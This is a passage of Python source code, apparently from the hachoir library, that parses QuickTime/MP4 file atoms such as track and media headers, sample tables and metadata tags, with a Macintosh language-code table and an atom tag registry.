from hachoir_core.field import (ParserError, FieldSet, MissingField,
Enum,
Bit, NullBits, Bits, UInt8, Int16, UInt16, Int32, UInt32, Int64, UInt64, TimestampMac32,
String, PascalString8, PascalString16, CString,
RawBytes, NullBytes, PaddingBytes)
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.text_handler import textHandler, hexadecimal
from hachoir_core.tools import MAC_TIMESTAMP_T0, timedelta
def timestampMac64(value):
    """Convert a 64-bit Mac timestamp (seconds since the Mac epoch,
    1904-01-01) into a datetime via MAC_TIMESTAMP_T0."""
    if isinstance(value, (float, int, long)):
        return MAC_TIMESTAMP_T0 + timedelta(seconds=value)
    raise TypeError("an integer or float is required")
# Build the 64-bit Mac timestamp field class from the converter above
# (64-bit counterpart of TimestampMac32).
from hachoir_core.field.timestamp import timestampFactory
TimestampMac64 = timestampFactory("TimestampMac64", timestampMac64, 64)
def fixedFloatFactory(name, int_bits, float_bits, doc):
    """Build a FieldSet subclass parsing a fixed-point number.

    name -- class name of the generated field class
    int_bits -- number of bits of the integer part
    float_bits -- number of bits of the fractional part
    doc -- docstring of the generated class
    """
    total_bits = int_bits + float_bits

    class Float(FieldSet):
        static_size = total_bits
        __doc__ = doc

        def createFields(self):
            yield Bits(self, "int_part", int_bits)
            yield Bits(self, "float_part", float_bits)

        def createValue(self):
            # Fractional part is scaled down by 2**float_bits.
            scale = float(1 << float_bits)
            return self["int_part"].value + self["float_part"].value / scale

    Float.__name__ = name
    return Float
# Common QuickTime fixed-point field types.
# Fixed: the 8.8 type was previously created with the class name "QTFloat32"
# (copy-paste error); the variable name and bit layout were already correct.
QTFloat16 = fixedFloatFactory("QTFloat16", 8, 8, "8.8 fixed point number")
QTFloat32 = fixedFloatFactory("QTFloat32", 16, 16, "16.16 fixed point number")
QTFloat2_30 = fixedFloatFactory("QTFloat2_30", 2, 30, "2.30 fixed point number")
class AtomList(FieldSet):
    """Sequence of QuickTime atoms parsed until the end of this field set."""

    def createFields(self):
        # Keep emitting atoms until the enclosing container is exhausted.
        while True:
            if self.eof:
                break
            yield Atom(self, "atom[]")
class TrackHeader(FieldSet):
    """'tkhd' atom: track header (flags, timing, layering, volume and the
    2D display transformation matrix)."""

    def createFields(self):
        yield UInt8(self, "version", "Version (0 or 1)")
        # 24 flag bits total: 20 reserved + 4 meaningful track flags.
        yield NullBits(self, "flags", 20)
        yield Bit(self, "is_in_poster")
        yield Bit(self, "is_in_preview", "Is this track used when previewing the presentation?")
        yield Bit(self, "is_in_movie", "Is this track used in the presentation?")
        yield Bit(self, "is_enabled", "Is this track enabled?")

        if self['version'].value == 0:
            # 32-bit version: dates and duration stored on 32 bits.
            yield TimestampMac32(self, "creation_date", "Creation time of this track")
            yield TimestampMac32(self, "lastmod_date", "Last modification time of this track")
            yield UInt32(self, "track_id", "Unique nonzero identifier of this track within the presentation")
            yield NullBytes(self, "reserved[]", 4)
            yield UInt32(self, "duration", "Length of track, in movie time-units")
        elif self['version'].value == 1:
            # 64-bit version: dates and duration stored on 64 bits.
            yield TimestampMac64(self, "creation_date", "Creation time of this track")
            yield TimestampMac64(self, "lastmod_date", "Last modification time of this track")
            yield UInt32(self, "track_id", "Unique nonzero identifier of this track within the presentation")
            yield NullBytes(self, "reserved[]", 4)
            yield UInt64(self, "duration", "Length of track, in movie time-units")
        # NOTE(review): versions other than 0/1 emit no date/duration fields,
        # so the following fields would be parsed at the wrong offset — confirm
        # such files do not occur in practice.

        yield NullBytes(self, "reserved[]", 8)
        yield Int16(self, "video_layer", "Middle layer is 0; lower numbers are closer to the viewer")
        yield Int16(self, "alternate_group", "Group ID that this track belongs to (0=no group)")
        yield QTFloat16(self, "volume", "Track relative audio volume (1.0 = full)")
        yield NullBytes(self, "reserved[]", 2)
        # 3x3 fixed-point display transformation matrix (a b u / c d v / x y w).
        yield QTFloat32(self, "geom_a", "Width scale")
        yield QTFloat32(self, "geom_b", "Width rotate")
        yield QTFloat2_30(self, "geom_u", "Width angle")
        yield QTFloat32(self, "geom_c", "Height rotate")
        yield QTFloat32(self, "geom_d", "Height scale")
        yield QTFloat2_30(self, "geom_v", "Height angle")
        yield QTFloat32(self, "geom_x", "Position X")
        yield QTFloat32(self, "geom_y", "Position Y")
        yield QTFloat2_30(self, "geom_w", "Divider scale")
        yield QTFloat32(self, "frame_size_width")
        yield QTFloat32(self, "frame_size_height")
class TrackReferenceType(FieldSet):
    """List of referenced track IDs (one 32-bit ID per entry) filling the atom."""

    def createFields(self):
        # Track IDs run to the end of the enclosing atom.
        while True:
            if self.eof:
                break
            yield UInt32(self, "track_id[]", "Referenced track ID")
class Handler(FieldSet):
    """'hdlr' atom: declares the component (media handler) for this track."""

    def createFields(self):
        yield UInt8(self, "version", "Version")
        yield NullBits(self, "flags", 24)
        yield String(self, "creator", 4)
        yield String(self, "subtype", 4)
        yield String(self, "manufacturer", 4)
        yield UInt32(self, "res_flags")
        yield UInt32(self, "res_flags_mask")
        # MPEG-4 files store the handler name as a NUL-terminated UTF-8 string;
        # classic QuickTime uses a Pascal (length-prefixed) string.
        if self.root.is_mpeg4:
            yield CString(self, "name", charset="UTF-8")
        else:
            yield PascalString8(self, "name")
class LanguageCode(FieldSet):
    """16-bit language code as used in the 'mdhd' atom.

    Values below 1024 are classic Macintosh language codes (MAC_LANG);
    larger values pack three 5-bit letters (ISO-639-2 style), each stored
    as (char - 0x60).
    """
    static_size = 16

    # Classic Macintosh language codes.
    # Fixed: the original literal defined keys 28 and 29 twice; Python keeps
    # only the last value of a duplicate key, so the shadowed entries
    # ('Latvian', 'Lappish') were dead code.  The effective values are kept
    # so runtime behavior is unchanged.
    MAC_LANG = {
        0: 'English',
        1: 'French',
        2: 'German',
        3: 'Italian',
        4: 'Dutch',
        5: 'Swedish',
        6: 'Spanish',
        7: 'Danish',
        8: 'Portuguese',
        9: 'Norwegian',
        10: 'Hebrew',
        11: 'Japanese',
        12: 'Arabic',
        13: 'Finnish',
        14: 'Greek',
        15: 'Icelandic',
        16: 'Maltese',
        17: 'Turkish',
        18: 'Croatian',
        19: 'Traditional Chinese',
        20: 'Urdu',
        21: 'Hindi',
        22: 'Thai',
        23: 'Korean',
        24: 'Lithuanian',
        25: 'Polish',
        26: 'Hungarian',
        27: 'Estonian',
        28: 'Lettish',   # also known as Latvian
        29: 'Saamisk',   # also known as Lappish (Sami)
        30: 'Faeroese',
        31: 'Farsi',
        32: 'Russian',
        33: 'Simplified Chinese',
        34: 'Flemish',
        35: 'Irish',
        36: 'Albanian',
        37: 'Romanian',
        38: 'Czech',
        39: 'Slovak',
        40: 'Slovenian',
        41: 'Yiddish',
        42: 'Serbian',
        43: 'Macedonian',
        44: 'Bulgarian',
        45: 'Ukrainian',
        46: 'Byelorussian',
        47: 'Uzbek',
        48: 'Kazakh',
        49: 'Azerbaijani',
        50: 'AzerbaijanAr',
        51: 'Armenian',
        52: 'Georgian',
        53: 'Moldavian',
        54: 'Kirghiz',
        55: 'Tajiki',
        56: 'Turkmen',
        57: 'Mongolian',
        58: 'MongolianCyr',
        59: 'Pashto',
        60: 'Kurdish',
        61: 'Kashmiri',
        62: 'Sindhi',
        63: 'Tibetan',
        64: 'Nepali',
        65: 'Sanskrit',
        66: 'Marathi',
        67: 'Bengali',
        68: 'Assamese',
        69: 'Gujarati',
        70: 'Punjabi',
        71: 'Oriya',
        72: 'Malayalam',
        73: 'Kannada',
        74: 'Tamil',
        75: 'Telugu',
        76: 'Sinhalese',
        77: 'Burmese',
        78: 'Khmer',
        79: 'Lao',
        80: 'Vietnamese',
        81: 'Indonesian',
        82: 'Tagalog',
        83: 'MalayRoman',
        84: 'MalayArabic',
        85: 'Amharic',
        86: 'Tigrinya',
        88: 'Somali',
        89: 'Swahili',
        90: 'Ruanda',
        91: 'Rundi',
        92: 'Chewa',
        93: 'Malagasy',
        94: 'Esperanto',
        128: 'Welsh',
        129: 'Basque',
        130: 'Catalan',
        131: 'Latin',
        132: 'Quechua',
        133: 'Guarani',
        134: 'Aymara',
        135: 'Tatar',
        136: 'Uighur',
        137: 'Dzongkha',
        138: 'JavaneseRom',
    }

    def fieldHandler(self, field):
        """Render one packed 5-bit letter (0 displays as a space)."""
        if field.value == 0:
            return ' '
        return chr(field.value + 0x60)

    def createFields(self):
        # Peek at the raw 16-bit value to decide between the two encodings.
        value = self.stream.readBits(self.absolute_address, 16, self.endian)
        if value < 1024:
            # Classic Macintosh language code.
            yield Enum(UInt16(self, "lang"), self.MAC_LANG)
        else:
            # Packed ISO-style code: pad bit + three 5-bit letters.
            yield NullBits(self, "padding[]", 1)
            yield textHandler(Bits(self, "lang[0]", 5), self.fieldHandler)
            yield textHandler(Bits(self, "lang[1]", 5), self.fieldHandler)
            yield textHandler(Bits(self, "lang[2]", 5), self.fieldHandler)

    def createValue(self):
        """Return the language as a display string, whichever encoding was used."""
        if 'lang' in self:
            return self['lang'].display
        return self['lang[0]'].display + self['lang[1]'].display + self['lang[2]'].display
class MediaHeader(FieldSet):
    """'mdhd' atom: media header (timing, language and quality of a media)."""

    def createFields(self):
        yield UInt8(self, "version", "Version (0 or 1)")
        yield NullBits(self, "flags", 24)
        if self['version'].value == 0:
            # 32-bit version: dates and duration stored on 32 bits.
            yield TimestampMac32(self, "creation_date", "Creation time of this media")
            yield TimestampMac32(self, "lastmod_date", "Last modification time of this media")
            yield UInt32(self, "time_scale", "Number of time-units per second")
            yield UInt32(self, "duration", "Length of media, in time-units")
        elif self['version'].value == 1:
            # 64-bit version: dates and duration stored on 64 bits
            # (time_scale stays 32-bit in both versions).
            yield TimestampMac64(self, "creation_date", "Creation time of this media")
            yield TimestampMac64(self, "lastmod_date", "Last modification time of this media")
            yield UInt32(self, "time_scale", "Number of time-units per second")
            yield UInt64(self, "duration", "Length of media, in time-units")
        yield LanguageCode(self, "language")
        yield Int16(self, "quality")
class VideoMediaHeader(FieldSet):
    """'vmhd' atom: graphics transfer mode and op color for a video track."""
    # graphicsmode value => (short name, description)
    GRAPHICSMODE = {
        0: ('Copy', "Copy the source image over the destination"),
        0x20: ('Blend', "Blend of source and destination; blending factor is controlled by op color"),
        0x24: ('Transparent', "Replace destination pixel with source pixel if the source pixel is not the op color"),
        0x40: ('Dither copy', "Dither image if necessary, else copy"),
        0x100: ('Straight alpha', "Blend of source and destination; blending factor is controlled by alpha channel"),
        0x101: ('Premul white alpha', "Remove white from each pixel and blend"),
        0x102: ('Premul black alpha', "Remove black from each pixel and blend"),
        0x103: ('Composition', "Track drawn offscreen and dither copied onto screen"),
        0x104: ('Straight alpha blend', "Blend of source and destination; blending factor is controlled by combining alpha channel and op color")
    }
    def graphicsDisplay(self, field):
        # Short name for a known mode, hex for an unknown one.
        if field.value in self.GRAPHICSMODE:
            return self.GRAPHICSMODE[field.value][0]
        return hex(field.value)
    def graphicsDescription(self, field):
        if field.value in self.GRAPHICSMODE:
            return self.GRAPHICSMODE[field.value][1]
        return ""
    def createFields(self):
        yield UInt8(self, "version", "Version")
        yield Bits(self, "flags", 24, "Flags (=1)")
        # The lambdas deliberately close over this specific field object so
        # display/description are computed lazily from its parsed value.
        graphics = UInt16(self, "graphicsmode")
        graphics.createDisplay = lambda:self.graphicsDisplay(graphics)
        graphics.createDescription = lambda:self.graphicsDescription(graphics)
        yield graphics
        yield UInt16(self, "op_red", "Red value for graphics mode")
        yield UInt16(self, "op_green", "Green value for graphics mode")
        yield UInt16(self, "op_blue", "Blue value for graphics mode")
class SoundMediaHeader(FieldSet):
    """'smhd' atom: stereo balance for a sound track."""
    def createFields(self):
        yield UInt8(self, "version", "Version")
        yield NullBits(self, "flags", 24)
        yield QTFloat16(self, "balance")
        yield UInt16(self, "reserved[]")
class HintMediaHeader(FieldSet):
    """'hmhd' atom: PDU size and bit-rate statistics for a hint track."""
    def createFields(self):
        yield UInt8(self, "version", "Version")
        yield NullBits(self, "flags", 24)
        yield UInt16(self, "max_pdu_size")
        yield UInt16(self, "avg_pdu_size")
        yield UInt32(self, "max_bit_rate")
        yield UInt32(self, "avg_bit_rate")
        yield UInt32(self, "reserved[]")
class DataEntryUrl(FieldSet):
    """'url ' data reference: location of media data, unless the
    self-contained flag says the data lives in this very file."""
    def createFields(self):
        yield UInt8(self, "version", "Version")
        yield NullBits(self, "flags", 23)
        yield Bit(self, "is_same_file", "Is the reference to this file?")
        # Self-referencing entries carry no location string at all.
        if not self['is_same_file'].value:
            yield CString(self, "location")
class DataEntryUrn(FieldSet):
    """'urn ' data reference: name + optional location of media data."""
    def createFields(self):
        yield UInt8(self, "version", "Version")
        yield NullBits(self, "flags", 23)
        yield Bit(self, "is_same_file", "Is the reference to this file?")
        if not self['is_same_file'].value:
            yield CString(self, "name")
            yield CString(self, "location")
class DataReference(FieldSet):
    """'dref' atom: table of data reference entries (url/urn sub-atoms)."""
    def createFields(self):
        yield UInt8(self, "version", "Version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count")
        for i in xrange(self['count'].value):
            yield Atom(self, "atom[]")
class EditList(FieldSet):
    """'elst' atom: edit segments mapping movie time to media time.

    Version 0 uses 32-bit duration/time entries, version 1 uses 64-bit.
    """
    def createFields(self):
        yield UInt8(self, "version", "Version (0 or 1)")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count")
        version = self['version'].value
        if version == 0:
            UInt, Int = UInt32, Int32
        elif version == 1:
            UInt, Int = UInt64, Int64
        else:
            raise ParserError("elst version %d not supported"%version)
        for i in xrange(self['count'].value):
            yield UInt(self, "duration[]", "Duration of this edit segment")
            yield Int(self, "time[]", "Starting time of this edit segment within the media (-1 = empty edit)")
            yield QTFloat32(self, "play_speed[]", "Playback rate (0 = dwell edit, 1 = normal playback)")
class Load(FieldSet):
    """'load' atom (old QuickTime spec): track pre-loading settings."""
    def createFields(self):
        yield UInt32(self, "start")
        yield UInt32(self, "length")
        yield UInt32(self, "flags") # PreloadAlways = 1 or TrackEnabledPreload = 2
        yield UInt32(self, "hints") # KeepInBuffer = 0x00000004; HighQuality = 0x00000100; SingleFieldVideo = 0x00100000
class MovieHeader(FieldSet):
    """'mvhd' atom: whole-presentation metadata -- timing, preferred
    playback settings, the 3x3 display transformation matrix, preview and
    selection ranges, and the next free track ID."""
    def createFields(self):
        yield UInt8(self, "version", "Version (0 or 1)")
        yield NullBits(self, "flags", 24)
        if self['version'].value == 0:
            # 32-bit version
            yield TimestampMac32(self, "creation_date", "Creation time of this presentation")
            yield TimestampMac32(self, "lastmod_date", "Last modification time of this presentation")
            yield UInt32(self, "time_scale", "Number of time-units per second")
            yield UInt32(self, "duration", "Length of presentation, in time-units")
        elif self['version'].value == 1:
            # 64-bit version (timescale stays 32-bit)
            yield TimestampMac64(self, "creation_date", "Creation time of this presentation")
            yield TimestampMac64(self, "lastmod_date", "Last modification time of this presentation")
            yield UInt32(self, "time_scale", "Number of time-units per second")
            yield UInt64(self, "duration", "Length of presentation, in time-units")
        yield QTFloat32(self, "play_speed", "Preferred playback speed (1.0 = normal)")
        yield QTFloat16(self, "volume", "Preferred playback volume (1.0 = full)")
        yield NullBytes(self, "reserved[]", 10)
        # 3x3 transformation matrix: (a b u / c d v / x y w).
        yield QTFloat32(self, "geom_a", "Width scale")
        yield QTFloat32(self, "geom_b", "Width rotate")
        yield QTFloat2_30(self, "geom_u", "Width angle")
        yield QTFloat32(self, "geom_c", "Height rotate")
        yield QTFloat32(self, "geom_d", "Height scale")
        yield QTFloat2_30(self, "geom_v", "Height angle")
        yield QTFloat32(self, "geom_x", "Position X")
        yield QTFloat32(self, "geom_y", "Position Y")
        yield QTFloat2_30(self, "geom_w", "Divider scale")
        yield UInt32(self, "preview_start")
        yield UInt32(self, "preview_length")
        yield UInt32(self, "still_poster")
        yield UInt32(self, "sel_start")
        yield UInt32(self, "sel_length")
        yield UInt32(self, "current_time")
        yield UInt32(self, "next_track_ID", "Value to use as the track ID for the next track added")
class FileType(FieldSet):
    """'ftyp' atom: major brand, version, and list of compatible brands."""
    def createFields(self):
        yield String(self, "brand", 4, "Major brand")
        yield UInt32(self, "version", "Version")
        # The compatible-brand list fills the remainder of the atom.
        while not self.eof:
            yield String(self, "compat_brand[]", 4, "Compatible brand")
def findHandler(self):
    ''' find the handler corresponding to this fieldset '''
    # Walk up the field tree until the enclosing 'media' or 'tags'
    # container is reached; give up once the root is passed.
    node = self
    while node:
        if node.name in ('media', 'tags'):
            break
        node = node.parent
    else:
        return None
    # Scan that container's children for the 'hdlr' atom.
    for atom in node:
        if atom['tag'].value == 'hdlr':
            return atom['hdlr']
    return None
class METATAG(FieldSet):
    """One name/value pair inside a 'meta' tag list (UTF-8 Pascal strings)."""
    def createFields(self):
        yield UInt8(self, "unk[]", "0x80 or 0x00")
        yield PascalString16(self, "tag_name", charset='UTF-8')
        yield UInt16(self, "unk[]", "0x0001")
        yield UInt16(self, "unk[]", "0x0000")
        yield PascalString16(self, "tag_value", charset='UTF-8')
class META(FieldSet):
    """'meta' atom: file metadata.

    The on-disk layout varies: a tag-count + METATAG list when under a
    /tags/ path, a versioned header + atom list when the first 32 bits are
    zero, or a bare atom list otherwise.
    """
    def createFields(self):
        # This tag has too many variant forms.
        if '/tags/' in self.path:
            yield UInt32(self, "count")
            for i in xrange(self['count'].value):
                yield METATAG(self, "tag[]")
        elif self.stream.readBits(self.absolute_address, 32, self.endian) == 0:
            yield UInt8(self, "version")
            yield Bits(self, "flags", 24)
            yield AtomList(self, "tags")
        else:
            yield AtomList(self, "tags")
class Item(FieldSet):
    """One entry of an 'mdta'-keyed item list: size, key index, value atom."""
    def createFields(self):
        yield UInt32(self, "size")
        yield UInt32(self, "index")
        yield Atom(self, "value")
class KeyList(FieldSet):
    """'keys' atom: table of metadata key atoms referenced by item index."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count")
        for i in xrange(self['count'].value):
            yield Atom(self, "key[]")
class ItemList(FieldSet):
    """'ilst' atom: metadata item list.

    Layout depends on the metadata handler: plain atoms for 'mdir'
    (iTunes-style) or indexed Item records for 'mdta'.
    """
    def createFields(self):
        handler = findHandler(self)
        if handler is None:
            raise ParserError("ilst couldn't find metadata handler")
        if handler['subtype'].value == 'mdir':
            while not self.eof:
                yield Atom(self, "atom[]")
        elif handler['subtype'].value == 'mdta':
            while not self.eof:
                yield Item(self, "item[]")
class NeroChapters(FieldSet):
    """'chpl' atom (Nero extension): chapter start times and names."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "unknown")
        yield UInt8(self, "count", description="Number of chapters")
        for i in xrange(self['count'].value):
            yield UInt64(self, "chapter_start[]")
            yield PascalString8(self, "chapter_name[]", charset='UTF-8')
class SampleDecodeTimeTable(FieldSet):
    """'stts' atom: run-length encoded decode-time deltas between samples."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count", description="Total entries in sample time table")
        for i in xrange(self['count'].value):
            yield UInt32(self, "sample_count[]", "Number of consecutive samples with this delta")
            yield UInt32(self, "sample_delta[]", "Decode time delta since last sample, in time-units")
class SampleCompositionTimeTable(FieldSet):
    """'ctts' atom: run-length encoded composition-time offsets per sample."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count", description="Total entries in sample time table")
        for i in xrange(self['count'].value):
            yield UInt32(self, "sample_count[]", "Number of consecutive samples with this offset")
            yield UInt32(self, "sample_offset[]", "Difference between decode time and composition time of this sample, in time-units")
class ChunkOffsetTable(FieldSet):
    """'stco' atom: 32-bit file offsets of each media data chunk."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count", description="Total entries in offset table")
        for i in xrange(self['count'].value):
            yield UInt32(self, "chunk_offset[]")
class ChunkOffsetTable64(FieldSet):
    """'co64' atom: 64-bit variant of the chunk offset table."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count", description="Total entries in offset table")
        for i in xrange(self['count'].value):
            yield UInt64(self, "chunk_offset[]")
class SampleEntry(FieldSet):
    """One entry of the 'stsd' sample description table.

    The layout after the common header depends on the track handler type
    (sound/video/hint), which is looked up via findHandler(); any bytes
    left over within the declared entry size are codec-specific extra data.
    """
    def createFields(self):
        yield UInt32(self, "size")
        yield RawBytes(self, "format", 4, "Data Format (codec)")
        yield NullBytes(self, "reserved[]", 6, "Reserved")
        yield UInt16(self, "data_reference_index")
        handler = findHandler(self)
        if not handler:
            raise ParserError("stsd couldn't find track handler")
        if handler['subtype'].value == 'soun':
            # Audio sample entry
            yield NullBytes(self, "reserved[]", 8)
            yield UInt16(self, "channels", "Number of audio channels")
            yield UInt16(self, "samplesize", "Sample size in bits")
            yield UInt16(self, "unknown")
            yield NullBytes(self, "reserved[]", 2)
            yield QTFloat32(self, "samplerate", "Sample rate in Hz")
        elif handler['subtype'].value == 'vide':
            # Video sample entry
            yield UInt16(self, "version")
            yield UInt16(self, "revision_level")
            yield RawBytes(self, "vendor_id", 4)
            yield UInt32(self, "temporal_quality")
            yield UInt32(self, "spatial_quality")
            yield UInt16(self, "width", "Width (pixels)")
            yield UInt16(self, "height", "Height (pixels)")
            yield QTFloat32(self, "horizontal_resolution", "Horizontal resolution in DPI")
            # NOTE(review): the field id below contains a space; kept as-is
            # because renaming it would change the parsed field path.
            yield QTFloat32(self, "vertical resolution", "Vertical resolution in DPI")
            yield UInt32(self, "data_size")
            yield UInt16(self, "frame_count")
            yield UInt8(self, "compressor_name_length")
            yield String(self, "compressor_name", 31, strip='\0')
            yield UInt16(self, "depth", "Bit depth of image")
            yield Int16(self, "unknown")
        elif handler['subtype'].value == 'hint':
            # Hint sample entry
            pass
        # Remaining bytes within the declared entry size, if any.
        size = self['size'].value - self.current_size//8
        if size > 0:
            yield RawBytes(self, "extra_data", size)
class SampleDescription(FieldSet):
    """'stsd' atom: table of SampleEntry records (codec descriptions)."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count", description="Total entries in table")
        for i in xrange(self['count'].value):
            yield SampleEntry(self, "sample_entry[]")
class SyncSampleTable(FieldSet):
    """'stss' atom: sample numbers that are random access points (keyframes)."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count", description="Number of sync samples")
        for i in xrange(self['count'].value):
            yield UInt32(self, "sample_number[]")
class SampleSizeTable(FieldSet):
    """'stsz' atom: per-sample sizes, or a single uniform size for all."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "uniform_size", description="Uniform size of each sample (0 if non-uniform)")
        yield UInt32(self, "count", description="Number of samples")
        # The per-sample table is present only when sizes are non-uniform.
        if self['uniform_size'].value == 0:
            for i in xrange(self['count'].value):
                yield UInt32(self, "sample_size[]")
class CompactSampleSizeTable(FieldSet):
    """'stz2' atom: sample sizes packed at field_size bits per entry."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield NullBits(self, "reserved[]", 24)
        yield UInt8(self, "field_size", "Size of each entry in this table, in bits")
        yield UInt32(self, "count", description="Number of samples")
        bitsize = self['field_size'].value
        for i in xrange(self['count'].value):
            yield Bits(self, "sample_size[]", bitsize)
        # Pad out to a byte boundary after the packed entries.
        if self.current_size % 8 != 0:
            yield NullBits(self, "padding[]", 8 - (self.current_size % 8))
class SampleToChunkTable(FieldSet):
    """'stsc' atom: maps runs of chunks to a samples-per-chunk count and
    a sample description index."""
    def createFields(self):
        yield UInt8(self, "version")
        yield NullBits(self, "flags", 24)
        yield UInt32(self, "count", description="Number of samples")
        for i in xrange(self['count'].value):
            yield UInt32(self, "first_chunk[]")
            yield UInt32(self, "samples_per_chunk[]")
            yield UInt32(self, "sample_description_index[]")
class Atom(FieldSet):
    """Generic QuickTime/MP4 atom: 32-bit size + 4-char tag, then a payload
    parsed by the handler registered for the tag in ``tag_info`` (unknown
    tags are kept as raw bytes).  Handles 64-bit sizes, unbounded atoms and
    'uuid' user-extension atoms."""
    # tag => (payload parser class, field name, description)
    tag_info = {
        "ftyp": (FileType, "file_type", "File type and compatibility"),
        # pdin: progressive download information
        # pnot: movie preview (old QT spec)
        "moov": (AtomList, "movie", "Container for all metadata"),
        "mvhd": (MovieHeader, "movie_hdr", "Movie header, overall declarations"),
        # clip: movie clipping (old QT spec)
        # crgn: movie clipping region (old QT spec)
        "trak": (AtomList, "track", "Container for an individual track or stream"),
        "tkhd": (TrackHeader, "track_hdr", "Track header, overall information about the track"),
        # matt: track matte (old QT spec)
        # kmat: compressed matte (old QT spec)
        "tref": (AtomList, "tref", "Track reference container"),
        "hint": (TrackReferenceType, "hint", "Original media track(s) for this hint track"),
        "cdsc": (TrackReferenceType, "cdsc", "Reference to track described by this track"),
        "edts": (AtomList, "edts", "Edit list container"),
        "elst": (EditList, "elst", "Edit list"),
        "load": (Load, "load", "Track loading settings (old QT spec)"),
        # imap: Track input map (old QT spec)
        "mdia": (AtomList, "media", "Container for the media information in a track"),
        "mdhd": (MediaHeader, "media_hdr", "Media header, overall information about the media"),
        "hdlr": (Handler, "hdlr", "Handler, declares the media or metadata (handler) type"),
        "minf": (AtomList, "minf", "Media information container"),
        "vmhd": (VideoMediaHeader, "vmhd", "Video media header, overall information (video track only)"),
        "smhd": (SoundMediaHeader, "smhd", "Sound media header, overall information (sound track only)"),
        "hmhd": (HintMediaHeader, "hmhd", "Hint media header, overall information (hint track only)"),
        # nmhd: Null media header, overall information (some tracks only) (unparsed)
        "dinf": (AtomList, "dinf", "Data information, container"),
        "dref": (DataReference, "dref", "Data reference, declares source(s) of media data in track"),
        "url ": (DataEntryUrl, "url", "URL data reference"),
        "urn ": (DataEntryUrn, "urn", "URN data reference"),
        "stbl": (AtomList, "stbl", "Sample table, container for the time/space map"),
        "stsd": (SampleDescription, "stsd", "Sample descriptions (codec types, initialization etc.)"),
        "stts": (SampleDecodeTimeTable, "stts", "decoding time-to-sample delta table"),
        "ctts": (SampleCompositionTimeTable, "ctts", "composition time-to-sample offset table"),
        "stsc": (SampleToChunkTable, "stsc", "sample-to-chunk, partial data-offset information"),
        "stsz": (SampleSizeTable, "stsz", "Sample size table (framing)"),
        "stz2": (CompactSampleSizeTable, "stz2", "Compact sample size table (framing)"),
        "stco": (ChunkOffsetTable, "stco", "Chunk offset, partial data-offset information"),
        "co64": (ChunkOffsetTable64, "co64", "64-bit chunk offset"),
        "stss": (SyncSampleTable, "stss", "Sync sample table (random access points)"),
        # stsh: shadow sync sample table
        # padb: sample padding bits
        # stdp: sample degradation priority
        # sdtp: independent and disposable samples
        # sbgp: sample-to-group
        # sgpd: sample group description
        # subs: sub-sample information
        # ctab color table (old QT spec)
        # mvex: movie extends
        # mehd: movie extends header
        # trex: track extends defaults
        # ipmc: IPMP control
        # moof: movie fragment
        # mfhd: movie fragment header
        # traf: track fragment
        # tfhd: track fragment header
        # trun: track fragment run
        # sdtp: independent and disposable samples
        # sbgp: sample-to-group
        # subs: sub-sample information
        # mfra: movie fragment random access
        # tfra: track fragment random access
        # mfro: movie fragment random access offset
        # mdat: media data container
        # free: free space (unparsed)
        # skip: free space (unparsed)
        "udta": (AtomList, "udta", "User data"),
        "meta": (META, "meta", "File metadata"),
        "keys": (KeyList, "keys", "Metadata keys"),
        ## hdlr
        ## dinf
        ## dref: data reference, declares source(s) of metadata items
        ## ipmc: IPMP control
        # iloc: item location
        # ipro: item protection
        # sinf: protection scheme information
        # frma: original format
        # imif: IPMP information
        # schm: scheme type
        # schi: scheme information
        # iinf: item information
        # xml : XML container
        # bxml: binary XML container
        # pitm: primary item reference
        ## other tags
        "ilst": (ItemList, "ilst", "Item list"),
        "trkn": (AtomList, "trkn", "Metadata: Track number"),
        "disk": (AtomList, "disk", "Metadata: Disk number"),
        "tmpo": (AtomList, "tempo", "Metadata: Tempo"),
        "cpil": (AtomList, "cpil", "Metadata: Compilation"),
        "gnre": (AtomList, "gnre", "Metadata: Genre"),
        "\xa9cpy": (AtomList, "copyright", "Metadata: Copyright statement"),
        "\xa9day": (AtomList, "date", "Metadata: Date of content creation"),
        "\xa9dir": (AtomList, "director", "Metadata: Movie director"),
        "\xa9ed1": (AtomList, "edit1", "Metadata: Edit date and description (1)"),
        "\xa9ed2": (AtomList, "edit2", "Metadata: Edit date and description (2)"),
        "\xa9ed3": (AtomList, "edit3", "Metadata: Edit date and description (3)"),
        "\xa9ed4": (AtomList, "edit4", "Metadata: Edit date and description (4)"),
        "\xa9ed5": (AtomList, "edit5", "Metadata: Edit date and description (5)"),
        "\xa9ed6": (AtomList, "edit6", "Metadata: Edit date and description (6)"),
        "\xa9ed7": (AtomList, "edit7", "Metadata: Edit date and description (7)"),
        "\xa9ed8": (AtomList, "edit8", "Metadata: Edit date and description (8)"),
        "\xa9ed9": (AtomList, "edit9", "Metadata: Edit date and description (9)"),
        "\xa9fmt": (AtomList, "format", "Metadata: Movie format (CGI, digitized, etc.)"),
        "\xa9inf": (AtomList, "info", "Metadata: Information about the movie"),
        "\xa9prd": (AtomList, "producer", "Metadata: Movie producer"),
        "\xa9prf": (AtomList, "performers", "Metadata: Performer names"),
        "\xa9req": (AtomList, "requirements", "Metadata: Special hardware and software requirements"),
        "\xa9src": (AtomList, "source", "Metadata: Credits for those who provided movie source content"),
        "\xa9nam": (AtomList, "name", "Metadata: Name of song or video"),
        "\xa9des": (AtomList, "description", "Metadata: File description"),
        "\xa9cmt": (AtomList, "comment", "Metadata: General comment"),
        "\xa9alb": (AtomList, "album", "Metadata: Album name"),
        "\xa9gen": (AtomList, "genre", "Metadata: Custom genre"),
